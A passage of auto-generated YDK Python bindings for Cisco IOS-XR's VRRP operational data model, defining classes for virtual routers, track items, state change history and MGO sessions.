.. attribute:: track_item_info
Track Item Info
**type**\: list of :py:class:`TrackItemInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo>`
**config**\: False
.. attribute:: state_change_history
State change history
**type**\: list of :py:class:`StateChangeHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter, self).__init__()
self.yang_name = "virtual-router"
self.yang_parent_name = "virtual-routers"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id']
self._child_classes = OrderedDict([("resign-sent-time", ("resign_sent_time", Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime)), ("resign-received-time", ("resign_received_time", Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime)), ("ipv6-operational-address", ("ipv6_operational_address", Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress)), ("ipv6-configured-down-address", ("ipv6_configured_down_address", Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress)), ("track-item-info", ("track_item_info", Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo)), ("state-change-history", ("state_change_history", Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('interface_name_xr', (YLeaf(YType.str, 'interface-name-xr'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('version', (YLeaf(YType.uint8, 'version'), ['int'])),
('address_family', (YLeaf(YType.enumeration, 'address-family'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBAf', '')])),
('session_name', (YLeaf(YType.str, 'session-name'), ['str'])),
('slaves', (YLeaf(YType.uint32, 'slaves'), ['int'])),
('is_slave', (YLeaf(YType.boolean, 'is-slave'), ['bool'])),
('followed_session_name', (YLeaf(YType.str, 'followed-session-name'), ['str'])),
('secondary_address_count', (YLeaf(YType.uint8, 'secondary-address-count'), ['int'])),
('operational_address_count', (YLeaf(YType.uint8, 'operational-address-count'), ['int'])),
('primary_virtual_ip', (YLeaf(YType.str, 'primary-virtual-ip'), ['str'])),
('configured_down_address_count', (YLeaf(YType.uint8, 'configured-down-address-count'), ['int'])),
('virtual_linklocal_ipv6_address', (YLeaf(YType.str, 'virtual-linklocal-ipv6-address'), ['str'])),
('primary_state', (YLeaf(YType.enumeration, 'primary-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVipState', '')])),
('master_ip_address', (YLeaf(YType.str, 'master-ip-address'), ['str'])),
('master_ipv6_address', (YLeaf(YType.str, 'master-ipv6-address'), ['str'])),
('master_priority', (YLeaf(YType.uint8, 'master-priority'), ['int'])),
('vrrp_state', (YLeaf(YType.enumeration, 'vrrp-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('authentication_type', (YLeaf(YType.enumeration, 'authentication-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpProtAuth', '')])),
('authentication_string', (YLeaf(YType.str, 'authentication-string'), ['str'])),
('configured_advertize_time', (YLeaf(YType.uint32, 'configured-advertize-time'), ['int'])),
('oper_advertize_time', (YLeaf(YType.uint32, 'oper-advertize-time'), ['int'])),
('min_delay_time', (YLeaf(YType.uint32, 'min-delay-time'), ['int'])),
('reload_delay_time', (YLeaf(YType.uint32, 'reload-delay-time'), ['int'])),
('delay_timer_flag', (YLeaf(YType.boolean, 'delay-timer-flag'), ['bool'])),
('delay_timer_secs', (YLeaf(YType.uint32, 'delay-timer-secs'), ['int'])),
('delay_timer_msecs', (YLeaf(YType.uint32, 'delay-timer-msecs'), ['int'])),
('authentication_flag', (YLeaf(YType.boolean, 'authentication-flag'), ['bool'])),
('force_timer_flag', (YLeaf(YType.boolean, 'force-timer-flag'), ['bool'])),
('preempt_flag', (YLeaf(YType.boolean, 'preempt-flag'), ['bool'])),
('ip_address_owner_flag', (YLeaf(YType.boolean, 'ip-address-owner-flag'), ['bool'])),
('is_accept_mode', (YLeaf(YType.boolean, 'is-accept-mode'), ['bool'])),
('preempt_delay_time', (YLeaf(YType.uint16, 'preempt-delay-time'), ['int'])),
('configured_priority', (YLeaf(YType.uint8, 'configured-priority'), ['int'])),
('operational_priority', (YLeaf(YType.uint8, 'operational-priority'), ['int'])),
('priority_decrement', (YLeaf(YType.uint32, 'priority-decrement'), ['int'])),
('tracked_interface_count', (YLeaf(YType.uint32, 'tracked-interface-count'), ['int'])),
('tracked_interface_up_count', (YLeaf(YType.uint32, 'tracked-interface-up-count'), ['int'])),
('tracked_item_count', (YLeaf(YType.uint32, 'tracked-item-count'), ['int'])),
('tracked_item_up_count', (YLeaf(YType.uint32, 'tracked-item-up-count'), ['int'])),
('time_in_current_state', (YLeaf(YType.uint32, 'time-in-current-state'), ['int'])),
('state_change_count', (YLeaf(YType.uint32, 'state-change-count'), ['int'])),
('time_vrouter_up', (YLeaf(YType.uint32, 'time-vrouter-up'), ['int'])),
('master_count', (YLeaf(YType.uint32, 'master-count'), ['int'])),
('adverts_received_count', (YLeaf(YType.uint32, 'adverts-received-count'), ['int'])),
('advert_interval_error_count', (YLeaf(YType.uint32, 'advert-interval-error-count'), ['int'])),
('adverts_sent_count', (YLeaf(YType.uint32, 'adverts-sent-count'), ['int'])),
('authentication_fail_count', (YLeaf(YType.uint32, 'authentication-fail-count'), ['int'])),
('ttl_error_count', (YLeaf(YType.uint32, 'ttl-error-count'), ['int'])),
('priority_zero_received_count', (YLeaf(YType.uint32, 'priority-zero-received-count'), ['int'])),
('priority_zero_sent_count', (YLeaf(YType.uint32, 'priority-zero-sent-count'), ['int'])),
('invalid_packet_count', (YLeaf(YType.uint32, 'invalid-packet-count'), ['int'])),
('address_list_error_count', (YLeaf(YType.uint32, 'address-list-error-count'), ['int'])),
('invalid_auth_type_count', (YLeaf(YType.uint32, 'invalid-auth-type-count'), ['int'])),
('auth_type_mismatch_count', (YLeaf(YType.uint32, 'auth-type-mismatch-count'), ['int'])),
('pkt_length_errors_count', (YLeaf(YType.uint32, 'pkt-length-errors-count'), ['int'])),
('time_stats_discontinuity', (YLeaf(YType.uint32, 'time-stats-discontinuity'), ['int'])),
('bfd_session_state', (YLeaf(YType.enumeration, 'bfd-session-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBfdSessionState', '')])),
('bfd_interval', (YLeaf(YType.uint32, 'bfd-interval'), ['int'])),
('bfd_multiplier', (YLeaf(YType.uint32, 'bfd-multiplier'), ['int'])),
('bfd_cfg_remote_ip', (YLeaf(YType.str, 'bfd-cfg-remote-ip'), ['str'])),
('bfd_configured_remote_ipv6_address', (YLeaf(YType.str, 'bfd-configured-remote-ipv6-address'), ['str'])),
('state_from_checkpoint', (YLeaf(YType.boolean, 'state-from-checkpoint'), ['bool'])),
('interface_ipv4_address', (YLeaf(YType.str, 'interface-ipv4-address'), ['str'])),
('interface_ipv6_address', (YLeaf(YType.str, 'interface-ipv6-address'), ['str'])),
('virtual_mac_address', (YLeaf(YType.str, 'virtual-mac-address'), ['str'])),
('virtual_mac_address_state', (YLeaf(YType.enumeration, 'virtual-mac-address-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVmacState', '')])),
('operational_address', (YLeafList(YType.str, 'operational-address'), ['str'])),
('ipv4_configured_down_address', (YLeafList(YType.str, 'ipv4-configured-down-address'), ['str'])),
])
self.interface_name = None
self.virtual_router_id = None
self.interface_name_xr = None
self.virtual_router_id_xr = None
self.version = None
self.address_family = None
self.session_name = None
self.slaves = None
self.is_slave = None
self.followed_session_name = None
self.secondary_address_count = None
self.operational_address_count = None
self.primary_virtual_ip = None
self.configured_down_address_count = None
self.virtual_linklocal_ipv6_address = None
self.primary_state = None
self.master_ip_address = None
self.master_ipv6_address = None
self.master_priority = None
self.vrrp_state = None
self.authentication_type = None
self.authentication_string = None
self.configured_advertize_time = None
self.oper_advertize_time = None
self.min_delay_time = None
self.reload_delay_time = None
self.delay_timer_flag = None
self.delay_timer_secs = None
self.delay_timer_msecs = None
self.authentication_flag = None
self.force_timer_flag = None
self.preempt_flag = None
self.ip_address_owner_flag = None
self.is_accept_mode = None
self.preempt_delay_time = None
self.configured_priority = None
self.operational_priority = None
self.priority_decrement = None
self.tracked_interface_count = None
self.tracked_interface_up_count = None
self.tracked_item_count = None
self.tracked_item_up_count = None
self.time_in_current_state = None
self.state_change_count = None
self.time_vrouter_up = None
self.master_count = None
self.adverts_received_count = None
self.advert_interval_error_count = None
self.adverts_sent_count = None
self.authentication_fail_count = None
self.ttl_error_count = None
self.priority_zero_received_count = None
self.priority_zero_sent_count = None
self.invalid_packet_count = None
self.address_list_error_count = None
self.invalid_auth_type_count = None
self.auth_type_mismatch_count = None
self.pkt_length_errors_count = None
self.time_stats_discontinuity = None
self.bfd_session_state = None
self.bfd_interval = None
self.bfd_multiplier = None
self.bfd_cfg_remote_ip = None
self.bfd_configured_remote_ipv6_address = None
self.state_from_checkpoint = None
self.interface_ipv4_address = None
self.interface_ipv6_address = None
self.virtual_mac_address = None
self.virtual_mac_address_state = None
self.operational_address = []
self.ipv4_configured_down_address = []
self.resign_sent_time = Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime()
self.resign_sent_time.parent = self
self._children_name_map["resign_sent_time"] = "resign-sent-time"
self.resign_received_time = Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime()
self.resign_received_time.parent = self
self._children_name_map["resign_received_time"] = "resign-received-time"
self.ipv6_operational_address = YList(self)
self.ipv6_configured_down_address = YList(self)
self.track_item_info = YList(self)
self.state_change_history = YList(self)
self._segment_path = lambda: "virtual-router" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/virtual-routers/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter, ['interface_name', 'virtual_router_id', 'interface_name_xr', 'virtual_router_id_xr', 'version', 'address_family', 'session_name', 'slaves', 'is_slave', 'followed_session_name', 'secondary_address_count', 'operational_address_count', 'primary_virtual_ip', 'configured_down_address_count', 'virtual_linklocal_ipv6_address', 'primary_state', 'master_ip_address', 'master_ipv6_address', 'master_priority', 'vrrp_state', 'authentication_type', 'authentication_string', 'configured_advertize_time', 'oper_advertize_time', 'min_delay_time', 'reload_delay_time', 'delay_timer_flag', 'delay_timer_secs', 'delay_timer_msecs', 'authentication_flag', 'force_timer_flag', 'preempt_flag', 'ip_address_owner_flag', 'is_accept_mode', 'preempt_delay_time', 'configured_priority', 'operational_priority', 'priority_decrement', 'tracked_interface_count', 'tracked_interface_up_count', 'tracked_item_count', 'tracked_item_up_count', 'time_in_current_state', 'state_change_count', 'time_vrouter_up', 'master_count', 'adverts_received_count', 'advert_interval_error_count', 'adverts_sent_count', 'authentication_fail_count', 'ttl_error_count', 'priority_zero_received_count', 'priority_zero_sent_count', 'invalid_packet_count', 'address_list_error_count', 'invalid_auth_type_count', 'auth_type_mismatch_count', 'pkt_length_errors_count', 'time_stats_discontinuity', 'bfd_session_state', 'bfd_interval', 'bfd_multiplier', 'bfd_cfg_remote_ip', 'bfd_configured_remote_ipv6_address', 'state_from_checkpoint', 'interface_ipv4_address', 'interface_ipv6_address', 'virtual_mac_address', 'virtual_mac_address_state', 'operational_address', 'ipv4_configured_down_address'], name, value)
class ResignSentTime(_Entity_):
"""
Time last resign was sent
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime, self).__init__()
self.yang_name = "resign-sent-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-sent-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime']['meta_info']
class ResignReceivedTime(_Entity_):
"""
Time last resign was received
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime, self).__init__()
self.yang_name = "resign-received-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-received-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime']['meta_info']
class Ipv6OperationalAddress(_Entity_):
"""
IPv6 Operational VRRP addresses
.. attribute:: ipv6_address
IPV6Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, self).__init__()
self.yang_name = "ipv6-operational-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-operational-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress']['meta_info']
class Ipv6ConfiguredDownAddress(_Entity_):
"""
IPv6 Configured but Down VRRP addresses
.. attribute:: ipv6_address
IPV6Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, self).__init__()
self.yang_name = "ipv6-configured-down-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-configured-down-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress']['meta_info']
class TrackItemInfo(_Entity_):
"""
Track Item Info
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo, self).__init__()
self.yang_name = "track-item-info"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo, ['interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo']['meta_info']
class StateChangeHistory(_Entity_):
"""
State change history
.. attribute:: time
Time of state change
**type**\: :py:class:`Time <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time>`
**config**\: False
.. attribute:: old_state
Old State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: new_state
New State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: reason
Reason for state change
**type**\: :py:class:`VrrpStateChangeReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpStateChangeReason>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory, self).__init__()
self.yang_name = "state-change-history"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("time", ("time", Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time))])
self._leafs = OrderedDict([
('old_state', (YLeaf(YType.enumeration, 'old-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('new_state', (YLeaf(YType.enumeration, 'new-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('reason', (YLeaf(YType.enumeration, 'reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpStateChangeReason', '')])),
])
self.old_state = None
self.new_state = None
self.reason = None
self.time = Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time()
self.time.parent = self
self._children_name_map["time"] = "time"
self._segment_path = lambda: "state-change-history"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory, ['old_state', 'new_state', 'reason'], name, value)
class Time(_Entity_):
"""
Time of state change
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time, self).__init__()
self.yang_name = "time"
self.yang_parent_name = "state-change-history"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4']['meta_info']
class MgoSessions(_Entity_):
"""
VRRP MGO Session information
.. attribute:: mgo_session
A VRRP MGO Session
**type**\: list of :py:class:`MgoSession <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.MgoSessions.MgoSession>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.MgoSessions, self).__init__()
self.yang_name = "mgo-sessions"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("mgo-session", ("mgo_session", Vrrp.MgoSessions.MgoSession))])
self._leafs = OrderedDict()
self.mgo_session = YList(self)
self._segment_path = lambda: "mgo-sessions"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.MgoSessions, [], name, value)
class MgoSession(_Entity_):
"""
A VRRP MGO Session
.. attribute:: session_name (key)
The name of the session
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: primary_session_name
Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: primary_session_interface
Interface of primary session
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: primary_af_name
Address family of primary session
**type**\: :py:class:`VrrpBAf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBAf>`
**config**\: False
.. attribute:: primary_session_number
VRID of primary session
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: primary_session_state
State of primary session
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: slave
List of slaves following this primary session
**type**\: list of :py:class:`Slave <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.MgoSessions.MgoSession.Slave>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.MgoSessions.MgoSession, self).__init__()
self.yang_name = "mgo-session"
self.yang_parent_name = "mgo-sessions"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['session_name']
self._child_classes = OrderedDict([("slave", ("slave", Vrrp.MgoSessions.MgoSession.Slave))])
self._leafs = OrderedDict([
('session_name', (YLeaf(YType.str, 'session-name'), ['str'])),
('primary_session_name', (YLeaf(YType.str, 'primary-session-name'), ['str'])),
('primary_session_interface', (YLeaf(YType.str, 'primary-session-interface'), ['str'])),
('primary_af_name', (YLeaf(YType.enumeration, 'primary-af-name'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBAf', '')])),
('primary_session_number', (YLeaf(YType.uint32, 'primary-session-number'), ['int'])),
('primary_session_state', (YLeaf(YType.enumeration, 'primary-session-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
])
self.session_name = None
self.primary_session_name = None
self.primary_session_interface = None
self.primary_af_name = None
self.primary_session_number = None
self.primary_session_state = None
self.slave = YList(self)
self._segment_path = lambda: "mgo-session" + "[session-name='" + str(self.session_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/mgo-sessions/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.MgoSessions.MgoSession, ['session_name', 'primary_session_name', 'primary_session_interface', 'primary_af_name', 'primary_session_number', 'primary_session_state'], name, value)
class Slave(_Entity_):
"""
List of slaves following this primary session
.. attribute:: slave_interface
Interface of slave
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: slave_virtual_router_id
VRID of slave
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.MgoSessions.MgoSession.Slave, self).__init__()
self.yang_name = "slave"
self.yang_parent_name = "mgo-session"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('slave_interface', (YLeaf(YType.str, 'slave-interface'), ['str'])),
('slave_virtual_router_id', (YLeaf(YType.uint32, 'slave-virtual-router-id'), ['int'])),
])
self.slave_interface = None
self.slave_virtual_router_id = None
self._segment_path = lambda: "slave"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.MgoSessions.MgoSession.Slave, ['slave_interface', 'slave_virtual_router_id'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
